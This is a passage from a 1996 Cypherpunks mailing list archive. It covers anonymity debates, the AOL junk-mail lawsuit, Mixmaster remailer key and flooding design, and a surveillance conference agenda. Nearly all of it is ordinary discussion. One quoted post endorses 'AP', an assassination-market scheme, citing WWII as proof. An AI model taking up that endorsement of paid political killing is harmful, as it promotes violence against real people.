late 1970's, I was on two mailing lists >(SF-Lovers and Human Net) and could read *all* of Usenet traffic >in an hour or two. In the late 1980's, Usenet traffic totalled The 2002 version, unless our list is outlawed as being part of a TICO (Terrorist-Influenced and Corrupt Organization) conspiracy: "I could read *all* of the Cypherpunks traffic in a day or two..." --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Sun Sep 8 20:55:18 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 9 Sep 1996 11:55:18 +0800 Subject: [NOISE] Far-reaching tentacles . . . ? Message-ID: At 11:38 PM 9/8/96, Alan Bostick wrote: >Found in the news: > > > (SACRAMENTO)- The principals of six Sacramento area schools have >received 46 used computers that were renovated by inmates at Folsom >Prison. Warden Theo White delivered the machines after they were given a >reprieve from the scrap heap. The prison obtained the donated personal >computers from the non-profit Detwiler Foundation... which began working ^^^^^^^^^^^^^^^^^^^ >five years ago to bring new technology into the state's classrooms. > >[Would you want *YOUR* CHILDREN to use computers that had been HACKED >by CONVICTED CRIMINALS????] Who cares about the convicted criminals? It's the connection to the Detwiler Foundation that would worry me. (Now that's what you call an S. Boxx!) --Medusa From dlv at bwalk.dm.com Sun Sep 8 20:55:26 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 9 Sep 1996 11:55:26 +0800 Subject: Shit from Juno In-Reply-To: Message-ID: <6DRyTD58w165w@bwalk.dm.com> Rabid Wombat writes: > > Complaints about spamming and cross-posting probably won't get you far, > either. On-Net spamvertizing seems to be their source of revenue. Perhaps > shaw.net needs to be contacted instead. It's either that, or give Floyd > and Richard a nickle to go watch batman instead of playing with the computer. FWIW, Juno is the project of D.E.Shaw, a very obnoxious investment bank here in NYC. It's ironic that the sysadmin at D.E.Shaw, Mark Moraes, is the moderator of some news.newbies? Usenet newsgroup. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jamesd at echeque.com Sun Sep 8 22:43:14 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 9 Sep 1996 13:43:14 +0800 Subject: ASEAN nations generally pro-censorship Message-ID: <199609090157.SAA13884@dns2.noc.best.net> > _________________________________________________________________ > ASEAN FORUM AGREES ON NEED TO POLICE THE NET > __________________________________________________________________________ >[...] > But the statement suggested there was no agreement on a uniform > approach to policing the Internet. One could argue that the hundred years war was in substantial part the result of regulatory arbitrage against attempts to censor the printing press, that it was in large part an unsuccessful attempt to create a uniform standard of censorship by force of arms. History suggests that there *wont* be a uniform approach on policing the net. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From tcmay at got.net Sun Sep 8 22:43:17 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 9 Sep 1996 13:43:17 +0800 Subject: "Intended Purpose" of the Cypherpunks List Message-ID: At 3:09 PM 9/8/96, Wayne H. Allen wrote: > Well maybe, political issues galore certainly, but very very little >to do with cryptography. I mean what does TWA 800 have to do with this >list. I mean lets be completely honest here, whatever the original >purpose of the list was for its been allowed to shift away from its >intended purpose considerably. I'm curious. You say the list has "been allowed to shift away from its intended purpose considerably." First, who "allowed" it. (We should perhaps track down those who allowed this and rap them upside the head.) Second, and more importantly, just what was its "intended purpose"? While I delete immediately fantasies about how the Bilderbergers ordered TWA 800 shot down with Russian Strelas as a warning for Bill Clinton, the other discussions related to TWA 800, e.g., mandatory person-number I.D. to board planes, increased inspections, national data bases of "suspicious persons," etc., are very much on-topic for this list. But, then, what would I know? --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From rodger at interramp.com Sun Sep 8 22:59:54 1996 From: rodger at interramp.com (Will rodger) Date: Mon, 9 Sep 1996 13:59:54 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: <199609090152.VAA12651@interramp.com> -----BEGIN PGP SIGNED MESSAGE----- Declan, in reply to questions about Cyber Promo's statue re: AOL wisely wrote: >>No. A customer buys service from AOL and in doing so signs a contract >>with the company. AOL and the customer each has certain rights and >>obligations spelled out in the contract. >> >>I confess I don't know if AOL's contract allows them to block spam. But >>in any case, spammers are not customers. >> >>-Declan >> Cyber Promotions of course is not now a client of AOL, which is one the company's defenses against AOL. Although AOL attorneys don't make the connection outright, their filings seem to imply that once one is an AOL customer, he's always subject to their rules. Wallace, it seems, had an account or two with AOL and was spamming during that time in violation of terms of service. They soon bumped him from the service. Now that he's not a subscriber, they claim Wallace is still violating terms of service. How that's relevant to a former subscriber is far from clear. Wallace's attorneys, of course say it isn't relevant at all. No doubt about it; this one is going to be a lot of fun. Will Rodger Washington Bureau Chief Inter at ctive Week -----BEGIN PGP SIGNATURE----- Version: 2.9 iQEVAgUBMjN30UcByjT5n+LZAQEO0QgAhKgbD1ljZfDoZR/J9PF9wQFgZxoSM8DZ SfhfPMNDnBDqx1dq2qjxbxKC0uqP5AQq76ZPr+MVexvdI9ec+8W9DFW/O8ujOsJT yU/vg0XnWC3kNeQVW9OpTjlNZrlm37TRM5Fl/JeBxrFlws1aS1fG57Xnq2YYEJJ2 hrn20q9szJiRLnFJ0hSfjhsYkLir7qErhqMMOu0kw1HAqfA7kAzmoxD4ukaeqqL9 Hkqqf2E59xtOSvmMRtqgtGhUijiMeuO1K/wCITp0SS6U4XieeHrV5jpfY3RU6c2s g7OBHkMq6fjzWO29WJO67imOeb45bsZMM3vvqKlH5lxXHR+g1DjUnw== =Iatg -----END PGP SIGNATURE----- From jamesd at echeque.com Sun Sep 8 23:07:48 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 9 Sep 1996 14:07:48 +0800 Subject: flimflamery on anonymity Message-ID: <199609090144.SAA12832@dns2.noc.best.net> james donald: > > Lucky Green and Dark Unicorn are not accountable. This is a problem? > > Because it is a problem "We" need to do something about it, (last line is sarcasm for the sarcasm impaired) At 11:39 AM 9/4/96 -0700, Vladimir Z. Nuri wrote: > scientists demand that each other be "accountable" for their > work, for example, and pseudonymous publication simply would > not be acceptable. So? Do you think cypherpunks are planning to go around with guns and force scientists to pay attention to pseudonymous scientific publications? > what about a business > that simply says, "we choose to require identity among our > customers, and you can go elsewhere if you disagree". the > extremist cypherpunks would be in a quandary over this example, > because they think they can support anarchocapitalist > freedom and anonymity at the same time. they will argue that > such a business will one day not exist. but shouldn't a business be > free to make this decision? rabid cpunks would probably > argue against such a decision. Cypherpunks would argue, do in fact argue, that such a business decision will be unwise in the long run for most businesses, but that all businesses, like anyone else, have the right to make stupid decisions. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From Adamsc at io-online.com Sun Sep 8 23:29:49 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 9 Sep 1996 14:29:49 +0800 Subject: talker (fwd) Message-ID: <19960909041342953.AAA192@IO-ONLINE.COM> On Sun, 8 Sep 1996 16:41:06 -0500 (CDT), Jim Choate wrote: >> Date: Sun, 8 Sep 1996 13:23:06 -0700 (PDT) >> From: "Z.B." >> Subject: Re: talker >> >> I just checked www.juno.com to see what kind of system they have, and it >> appears that it is a free email service. No charges at all. No wonder >> we get so many idiots from there - free mail and they probably don't >> bother to verify the people they give service to, either. > >Well we know at least one cpunk who is anti-anonymity.... Not necessarily. I think he's just saying that if it's free and anonymous you have no quality control. Even a token fee keeps out an amazing number of loons... - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From loki at infonex.com Sun Sep 8 23:44:03 1996 From: loki at infonex.com (Lance Cottrell) Date: Mon, 9 Sep 1996 14:44:03 +0800 Subject: forward secrecy in mixmaster In-Reply-To: Message-ID: At 11:29 AM -0700 9/8/96, Adam Back wrote: >Lance Cottrell writes on several lists: >I suspected RSAs weird license might be the problem. (Given the >situation with PGP 2.x, I presume that the license does not permit you >to increase the max arithmetic precision.) Our options will open up alot when the patent expires next year. >> That is one of the reasons I have each remailer creat its own DH >> modulus, and allow it to change it periodically. > >Each remailer with it's own prime doesn't buy you a whole lot of >entropy because there aren't many mixmaster remailers, 4 bits >currently?. The entropy from having rekeying every day instead of say >every year, another 9 bits, 13 bits tops? I'm not sure what the >precise entropy increase is from going to 1024 to 4096, but it's got >to be many orders of magnitude better than 13 bits. > >I'd say junk RSAREF for the DH operations, use one of the other libs. >(You can do this for DH, without violating patents, right? But not >for RSA, so I guess if you care about the patent/license agreement >mess, you've got to use RSAREF for RSA signatures at least). Or maybe >you could just wait for PGP 3.0 which uses El Gamal, for sigs and pk >encryption, and presumably will have less restrictive key sizes. I agree it does not make much difference mathematically, but one DH modulus always makes me uneasy. DH is still patented though. I think I will continue to use RSAREF, but compose the standard so the protocol supports unlimited key sizes. >So as well as having bigger signing keys, for the sake of paranoia >(it's contagious), as you were saying, I guess you may gain some >security by not having a common modulus, and making the protocol allow >re-keying. > >If you used a different password for RSA and DH keys, and your machine >is compromised, you can sign a new DH key with RSA, and use El Gamal >signatures with the DH key normally. Hows that for paranoid :-) > >(Or another temporary RSA key, and RSA sigs, rather than El Gamal >sigs, whatever. You sign by proxy, that is the receiver mixmaster >gets a the temporary key signed by the long term RSA key, checks the >signature on the temporary key, and then checks the signature made by >the temporary key on the object in question). > >Greatly reduces the risk of having the password in the binary. You'd >need to manually type the RSA keys password to rekey, or if you were >real paranoid, you could keep the RSA key on your laptop, and copy the >new signed DH public key on to the remailer. Do this once a month, or >as often as you wish. > >This is a similar approach to that taken by people who have a huge >signing only PGP key, which they are careful to keep only on machines >they physically control, and have smaller keys which they use on >multi-user systems. For now I think we might just suggest that the operator keep a big PGP key to sign new key releases with. Key management is a whole nother thorny issue. I would love to see that whole part of Mixmaster reworked. Some deep thought should go into managing and distributing keys (it was almost an afterthought in my design). >> >a) include the DH key signed by the RSA key in the remailers public key >> > (may break backwards compatibility with existing versions of >> > mixmaster) >> > >> >b) send the DH public key at the start of each session >> > >> >c) send the DH public key on request >> >> I chose C. The in protocol I developed the sending remailer (A) sends a >> hash of the DH modulus to the receiving remailer (B). If B has it, they use >> it. If not, A sends it. I use the modulus from A because it has the stake >> in privacy. B will take messages from anyone, but A wants to know the >> messages it has goes to the correct other remailer B. > >sounds fine. > >Also, you might want to migrate to SHA1 in place of MD5, at some >point. Or to one of those megahashes like > > SHA1(MD5(x))||MD5(SHA1(x)) It is something to consider. Right now the software is not that flexible, but it should be in the next major revision. I too would like to move from total MD5 dependence. >Also mixmaster has capabilities like type 1 remailers right? If so >you would presumably add a capability indicating that the remailer >supports direct socket delivery. And another capability for forward >secrecy (the other thread "non-interactive forward secrecy" discusses >ways to retro-fit a less interactive forward secrecy mechanism into >email delivered mixmaster packets). Mixmaster recognizes type 1 messages, and passes them to a type 1 remailer. >The socket capability presumably would be useful to know that it is >likely to react more quickly. Forward secrecy is obviously nice to >know about for other reasons. > >Adam Socket support for type 1 is more complicated. The known RSA key is now the PGP key which encrypted the message. It is going to be a lot more complicated to go in a get all the info needed using PGP. Given a PGP library it could be done within Mixmaster, but it seems outside the scope of the program. My personal feeling is that as Mixmaster improves and gets more widely ported, type 1 should phase out. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From jamesd at echeque.com Sun Sep 8 23:47:42 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 9 Sep 1996 14:47:42 +0800 Subject: Voluntary Disclosure of True Names Message-ID: <199609090304.UAA20216@dns2.noc.best.net> At 10:49 AM 9/5/96 -0700, Vladimir Z. Nuri wrote: > I have seen it repeated here often that somehow anonymity is some kind > of a "right" that one should have in all kinds of different & important > transactions, not merely on "cyberspace debate societies". I see > here frequently the implication that *private*entities* that want to > enforce identity in their own transactions are somehow implementing > a corrupt, orwellian system. We hold that private entities have the right to attempt to impose corrupt orwellian systems provided they do not do it at gunpoint, but we doubt that they will succeed without guns. > it sounded to me like that was all > Dyson was advocating. "Restrictions much stronger than a warrant" would imply that remailers would have to keep logs under penalty of law. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From sunder at brainlink.com Sun Sep 8 23:48:52 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Mon, 9 Sep 1996 14:48:52 +0800 Subject: Cypherpunks subscribers - Singapore and NZ gvts, plus IRS In-Reply-To: <199609082254.WAA04422@pipe3.t1.usa.pipeline.com> Message-ID: Actuall I do have one user subscribing to my filtered list from the irs. :) ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From declan at eff.org Mon Sep 9 00:13:41 1996 From: declan at eff.org (Declan McCullagh) Date: Mon, 9 Sep 1996 15:13:41 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <199609090152.VAA12651@interramp.com> Message-ID: Thanks, Will, for the clarification. I agree that this will be a *very* interesting case and a lot of fun to watch. :) I should clarify one thing I said earlier in which I mentioned the court's "opinion." That seems to imply something lengthy. In fact, it was not. The order was a one-page TRO. -Declan On Sun, 8 Sep 1996, Will rodger wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Declan, in reply to questions about Cyber Promo's statue re: AOL wisely wrote: > > >>No. A customer buys service from AOL and in doing so signs a contract > >>with the company. AOL and the customer each has certain rights and > >>obligations spelled out in the contract. > >> > >>I confess I don't know if AOL's contract allows them to block spam. But > >>in any case, spammers are not customers. > >> > >>-Declan > >> > > Cyber Promotions of course is not now a client of AOL, which is one the company's defenses against AOL. Although AOL attorneys don't make the connection outright, their filings seem to imply that once one is an AOL customer, he's always subject to their rules. Wallace, it seems, had an account or two with AOL and was spamming during that time in violation of terms of service. They soon bumped him from the service. > > Now that he's not a subscriber, they claim Wallace is still violating terms of service. How that's relevant to a former subscriber is far from clear. Wallace's attorneys, of course say it isn't relevant at all. > > No doubt about it; this one is going to be a lot of fun. > > Will Rodger > Washington Bureau Chief > Inter at ctive Week > > -----BEGIN PGP SIGNATURE----- > Version: 2.9 > > iQEVAgUBMjN30UcByjT5n+LZAQEO0QgAhKgbD1ljZfDoZR/J9PF9wQFgZxoSM8DZ > SfhfPMNDnBDqx1dq2qjxbxKC0uqP5AQq76ZPr+MVexvdI9ec+8W9DFW/O8ujOsJT > yU/vg0XnWC3kNeQVW9OpTjlNZrlm37TRM5Fl/JeBxrFlws1aS1fG57Xnq2YYEJJ2 > hrn20q9szJiRLnFJ0hSfjhsYkLir7qErhqMMOu0kw1HAqfA7kAzmoxD4ukaeqqL9 > Hkqqf2E59xtOSvmMRtqgtGhUijiMeuO1K/wCITp0SS6U4XieeHrV5jpfY3RU6c2s > g7OBHkMq6fjzWO29WJO67imOeb45bsZMM3vvqKlH5lxXHR+g1DjUnw== > =Iatg > -----END PGP SIGNATURE----- > // declan at eff.org // I do not represent the EFF // declan at well.com // From azur at netcom.com Mon Sep 9 00:45:36 1996 From: azur at netcom.com (Steve Schear) Date: Mon, 9 Sep 1996 15:45:36 +0800 Subject: Browne and foreign tyrants Message-ID: > jim bell wrote: > >And this was a real shame. Over 30 million people died in WWII, directly or >indirectly. We knew that Hitler was going to be a problem well before 1936. > Think how many could have been saved... > >If anything, WWII is excellent proof that AP is a good idea. Stauffenberg >was the German who bombed Hitler's meeting in 1944 but failed to kill him. >Stauffenberg knew as early as 1942 that Hitler needed to be killed, and a >recent "60 Minutes" episode related how hundreds of people knew about this >plot. In the late 30's Bugsy Seigel was in Europe visiting a friend (a countess, I believe). At one of her parties Hitler and a few henchmen also showed up. When Buggsy found out who they were he went to get his gun and finish them off. It was only on the pleading of his friend, that it would set off an international incident and could ruin her, that Buggsy relented. Too bad he wasn't more of a hot head. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From sophi at best.com Mon Sep 9 00:49:12 1996 From: sophi at best.com (Greg Kucharo) Date: Mon, 9 Sep 1996 15:49:12 +0800 Subject: Conservation Laws, Money, Engines, and Ontology Message-ID: <199609090401.VAA26172@dns2.noc.best.net> One thing that occurs here. I imagine a scenario where you have a "share" of resources on a system(and ISP for example). You're metered as to how much you can post or store. Actually as it is now posting is regulated through extra payments per meg above the limit. Spam is being somewhat regulated by Terms of Service type things, but my point is what is to prevent pooling resources among several system to achive the same Spam pursuits some have. Say for example that an individual gets several accounts to balance the load at thier point. The Usenet for example has no "choke point". How could ISP's apply conservation here? If you limit the amount of traffic you still aren't holding back the flow of "spam". Here's where reputations could come in. You cound't open a new account anywhere without a good "reputation". This could aid in balancing the load of certain people. ??????????????????????????????????????? Greg Kucharo sophi at best.com "Eppur si moeve" -Galileo ??????????????????????????????????????? From moroni at scranton.com Mon Sep 9 00:52:03 1996 From: moroni at scranton.com (Moroni) Date: Mon, 9 Sep 1996 15:52:03 +0800 Subject: [NOISE] Far-reaching tentacles . . . ? In-Reply-To: Message-ID: Who cares! Computers are computers. I wish someone would send me one,reconditioned or not. I am back on a dumb terminal because my 8088's hd gave up the ghost and deceided to leave it at the shop while I upgrade. On Sun, 8 Sep 1996, Timothy C. May wrote: > At 11:38 PM 9/8/96, Alan Bostick wrote: > >Found in the news: > > > > > > (SACRAMENTO)- The principals of six Sacramento area schools have > >received 46 used computers that were renovated by inmates at Folsom > >Prison. Warden Theo White delivered the machines after they were given a > >reprieve from the scrap heap. The prison obtained the donated personal > >computers from the non-profit Detwiler Foundation... which began working > ^^^^^^^^^^^^^^^^^^^ > >five years ago to bring new technology into the state's classrooms. > > > >[Would you want *YOUR* CHILDREN to use computers that had been HACKED > >by CONVICTED CRIMINALS????] > > Who cares about the convicted criminals? It's the connection to the > Detwiler Foundation that would worry me. > > (Now that's what you call an S. Boxx!) > > --Medusa > > > From banisar at epic.org Mon Sep 9 01:01:16 1996 From: banisar at epic.org (Dave Banisar) Date: Mon, 9 Sep 1996 16:01:16 +0800 Subject: AST Final Agenda Message-ID: Hello, I hope you will be able to join us for our conference in Ottawa next week. Here is the final agenda. Dave PROGRAM ADVANCED SURVEILLANCE TECHNOLOGIES CONFERENCE II Sponsored by Privacy International Electronic Privacy Information Center September 16, 1996 Citadel Ottawa Hotel and Convention Centre Ottawa, Canada 9:00 am COFFEE AND REGISTRATION 9:30 am WELCOME AND INTRODUCTION: NURTURING THE SURVEILLANCE SOCIETY Advanced surveillance functions have become an integral part of widescale information systems used by governments and businesses. Monitoring of the activities of individuals is seen as a desirable - and often technically essential - componennt in many of these systems. Once regarded as purpose-built stand alone innovations, the modern surveillance device for identification, profiling or tracking has been re-invented as a tool for commercial leverage. In these introductory remarks, Simon Davies and Dave Banisar explores the key technical, political, cultural and legal changes that are nurturing the growth of surveillance technologies across the world. o Simon Davies, London School of Economics & Director General, Privacy International oDave Banisar, Electronic Privacy Information Center & editor, International Privacy Bulletin 10:15 am FEATURED SPEAKER: SURVEILLANCE TECHNOLOGIES OF THE INTELLIGENCE AGENCIES What kinds of technologies are the intelligence agencies of the world using? Who are they using it against? Are they legally accountable for their actions? Mike Frost, a former spy for the Canadian Security Establishment will talk about his experiences using these technologies to spy on Canadian citizens and the relationship of the CSE to the US National Security Agency. o Mike Frost, Former Intelligence Officer, Canadian Communications Security Establishment & author, Spyworld 11:00 am BREAK 11:15 am SURVEILLANCE AND THE INTERNET SIGINT ONLINE: GOVERNMENT SIGNALS INTELLIGENCE ON THE NET o Wayne Madsen, Author, Handbook of Personal Data Protection >From Fort Meade, Maryland to Cheltenham, England and from Canberra, Australia to Issy les Moulineaux in Paris, signals intelligence (SIGINT) specialists are honing their skills at monitoring digital information. SIGINT agencies everywhere are increasingly throwing their surveillance web over the Internet and other data networks of interest. This session shall examine the methods by which SIGINT agencies conduct such on-line intelligence-gathering activities, including manipulation of encryption systems to exploiting weaknesses in communications architectures, including the use of anonymous remailers, rigging encryption systems, and tampering with the simple network management protocol (SNMP). You will discover that Mae West is more than just a deceased movie star. Datamining the Net: Cookies, Crawlers and Trackers o Simson Garfinkel, author, Practical Unix and Internet Security and PGP: Pretty Good Privacy. A great deal of information is gathered on individuals on the Internet. >From Alta Vista to cookies to digital cash to Web Crawler, sophicated tools to collect, index and process this information are being developed. Simson Garfinkel will discuss these technologies, what information is being gathered and what is being done with it. 12:30 pm LUNCH (provided) 1:30 pm CONSUMERS AND SURVEILLANCE INTELLIGENT VEHICLES AND TRACKING Phil Agre will outline the remarkable variety of technologies of surveillance currently being planned or implemented for road travel. The motivations for these systems are numerous and include logistics, traffic management, law enforcement, pollution control, and marketing. Despite the diversity of motivations, certain unifying themes emerge. The vast majority of the functionalities provided by these systems can be provided anonymously. o Phil Agre, University of California, San Diego GENETICS AS A SURVEILLANCE IDEOLOGY Researches in the field of genetics are still largely dominated by the works of molecular biologists who tend to comprehend reality through the classical Cartesian-Newtonian paradigm which postulates that it is possible to reduce the universe to a mechanical model in which peticular effects can be described as the direct results of specific causes. Such an approach does not acknowledge the fact that human physical and mental health is the result of very complex interactions. Most illnesses and deviant behaviors are multifactorial (physical and social environments are at least as much important as the genetic factors) and polygenic (numerous genes could be involved). In short, there are large probabilities that an individual carrying many "defective" genes may never develop the corresponding illness. Unfortunately, such fields of activities such as risk management, insurance, law and policy-making also work mostly within the Cartesian-Newtonian paradigm. In such a context, genetics can easily be transformed into an ideological justification for surveillance and social control of populations or individuals "at risk" as well as minimizing social and environmental responsabilities. o Pierrot Peladeau, Progesta Inc. & editor Privacy Files 2:45 pm BREAK 3:00 pm SOLUTIONS: PROTECTING PRIVACY IN SURVEILLANCE SOCIETIES A PRIVACY COMMISSIONER CASE STUDY: INTRODUCTION OF A DNA PROFILE DATABANK TO NEW ZEALAND Bruce Slane, Privacy Commissioner of New Zealand, will outline aspects of a new law which came into force in New Zealand last month. The law sanctions the establishment of a DNA profile database for police use in criminal investigations. The law also spells out how blood samples may be obtained from suspects for DNA analysis - voluntarily, by court order, and ultimately by force if need be. Bruce will explain the role of a Privacy Commissioner in scrutinising laws increasing state surveillance using the DNA law as a case study. o Bruce Slane. New Zealand Privacy Commissioner CAN PRIVACY STANDARDS ACHIEVE EFFECTIVE DATA PROTECTION? Privacy standards are becoming an important feature of the privacy protection landscape. The CSA Model Code for the Protection of Personal Information is likely to followed by other attempts to negotiate standards in other countries and at the international level. What are the market and regulatory incentives for the adoption of privacy standards? Can privacy standards exist alongside data protection legislation? What are the minimum requirements for a registration/accreditation system for a privacy standard? o Colin Bennett, University of Victoria 4:30 pm WRAPUP ---------------------------------------------------------------------------- MORE INFORMATION More information on the conference will be available at the Privacy International mailing list at pi-news at privacy.org (subject: subscribe) or at the PI Home Page at http://www.privacy.org/pi/conference/ottawa/ ---------------------------------------------------------------------------- REGISTRATION Registration Fees [] Standard - $250 CAN ($175 US) [] Non-profit organizations/Educational - $125 CAN ($75 US) Information Name: ___________________________________________________________ Organization: ______________________________________________________ Address: _________________________________________________________ __________________________________________________________________ Phone/Fax: _________________________________________________________ Electronic Mail:_____________________________________________________ Credit card Number/Expiration Date: _________________________________ (Your credit card will be billed by "Diane Publishing" - Do Not Email!) First Virtual Account (include email address)_________________________ Fax Registration form and credit card number to +1 202.547.5482 Send Check or Money Order in $US made out to Privacy International to: Privacy International Washington Office 666 Pennsylvania Ave, SE, Suite 301 Washington, DC 20003 USA 1-202-544-9240 (phone) 1-202-547-5482 (fax) pi at privacy.org(email) ---------------------------------------------------------------------------- Privacy International was formed in 1990 as a watchdog on surveillance by governments and corporations. With members in more than 40 countries, it has created an international movement that has helped to counter abuses of privacy by way of information technology. Privacy International has conducted campaigns in Europe, Asia and North America to raise awareness about the dangers of ID card systems, military surveillance, data matching, police information systems, and credit reporting. It is based in London, UK, and is administered by the Electronic Privacy Information Center (EPIC) in Washington, D.C. Privacy International publishes a quarterly newsletter (the International Privacy Bulletin) and organizes conferences each year on privacy and technology. More information is available at http://www.privacy.org/pi/ The Electronic Privacy Information Center is a public interest research center in Washington, DC. It was established in 1994 to focus public attention on emerging privacy issues relating to the National Information Infrastructure, such as the Clipper Chip, the Digital Telephony proposal, medical record privacy, and the sale of consumer data. EPIC is sponsored by the Fund for Constitutional Government, a non-profit organization established in 1974 to protect civil liberties and constitutional rights. EPIC publishes the EPIC Alert, pursues Freedom of Information Act litigation, and conducts policy research. For more information, email info at epic.org, HTTP://www.epic.org or write EPIC, 666 Pennsylvania Ave., SE, Suite 301, Washington, DC 20003. +1 202 544 9240 (tel), +1 202 547 5482 (fax). From loki at infonex.com Mon Sep 9 01:21:35 1996 From: loki at infonex.com (Lance Cottrell) Date: Mon, 9 Sep 1996 16:21:35 +0800 Subject: strengthening remailer protocols In-Reply-To: <9608231805.AA01523@clare.risley.aeat.co.uk> Message-ID: At 2:25 PM -0700 9/2/96, John Anonymous MacDonald wrote: >I don't really see the use of this complicated scheme. The main >problem seems to be that if M floods remailer R with messages to B, >and A sends a message to C through R, then it will be clear to M that >A's message was destined for C. > >Rather than divert messages, then, I propose that for each input >message there is a 10% chance that a piece of cover traffic is >generated. Thus, if M sends 50 messages through R and sees 6 outgoing >messages going to remailers C, D, and D, he will now know which >messages correspond to the message that A send through. I quite like this load based cover traffic scheme. Another defense against flood is to slow the rate at which the messages leave the system. A simple modification to Mixmaster (which will be in the next version) is to have an exponential pool. The operator sets two parameters, a minimum pool size, and a fraction of messages to send each time the pool is processed. 10 messages and 10% seem like good settings to me. Given at least one cover message each time the pool is processed, flooding is much less productive. A side benefit of this system is a reduction in the load on the sendmail system during a flood or spam. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From rp at rpini.com Mon Sep 9 01:29:55 1996 From: rp at rpini.com (Remo Pini) Date: Mon, 9 Sep 1996 16:29:55 +0800 Subject: Photoshop, Steganograhy, and cypherpunks? Message-ID: <9609090620.AA24328@srzts100.alcatel.ch> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Mon Sep 09 08:17:48 1996 > Digital watermarking > adds copyright information to > a photograph that doesn't alter the photo's > appearance. The watermark is detectable even > after the photo is edited or printed and rescanned. ^^^^^^^^^^^^^^^^^^^^^^ go ahead, have a laugh!!! (or show me an affordable scanner with REAL 8bit color and a calibrated color scheme). - ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQEVAwUBMjO2kBFhy5sz+bTpAQGbCwf/TCkJvS/8Z3ER3YdR7S2jNw0SrIkDXRT/ GtfvKgmTrk+YMI+5Ko9aL7wu2XgdUF5dzjo1slpNBp8hbrMWUGiNufcI5FDnzrqP z5lCTZefsHounFV8LaQk19iODOAt6EA5Bo7hAMNH4MTsl07dHJ2wudEntmLA4Hpl Xo1U/u/+PrTROK/O4wHEcDVyMsEFhHW7rBdhx5U5Sh58CtI3ijQ9xfW2L9dCQHUF +SVaXTgHYaHnpBpKitkAgEEd2m2jVC7E6S0pPkEBm0k0yXzBNT9zBaD5xtUxI/kI sJWNQCCq4f0VXm1wl27H+FYYUD/VdLc/pniFppmVa+WEDFGGlWXnqw== =ajST -----END PGP SIGNATURE----- From loki at infonex.com Mon Sep 9 01:36:25 1996 From: loki at infonex.com (Lance Cottrell) Date: Mon, 9 Sep 1996 16:36:25 +0800 Subject: strengthening remailer protocols In-Reply-To: Message-ID: Mixmaster prevents replay, so flooding multiple copies of a single message will not work. This is the reason Mixmaster has no reply block feature. I can see two ways in which replies can work safely. One time reply blocks. Each block is used once and only once. Each routes separately, and the creator never deploys 